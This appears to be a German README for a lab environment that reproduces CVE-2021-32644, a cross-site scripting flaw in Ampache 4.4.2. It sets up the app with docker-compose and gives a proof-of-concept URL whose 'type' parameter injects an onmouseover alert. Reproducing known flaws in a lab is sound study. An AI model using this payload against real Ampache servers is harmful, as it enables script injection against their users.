
Ampache XSS
Diese Schwachstelle ist eine XSS-Schwachstelle, die Ampache bis zu Versionen vor 4.4.3 betraf. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
Bitte führen Sie während der Installation das Portforwarding in der Datei docker-compose.yml durch. Die aktuell installierte Ampache-Version ist 4.4.2.
$docker-compose up
Navigieren Sie zu http://[web-server ip]:port/.
Navigieren Sie zu http://[web-server ip]:port/.
Richten Sie die mysql-Datenbank wie im folgenden Bild ein.

Wenn Sie den folgenden PoC einfügen, können Sie sehen, dass die XSS-Schwachstelle ausgelöst wird.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html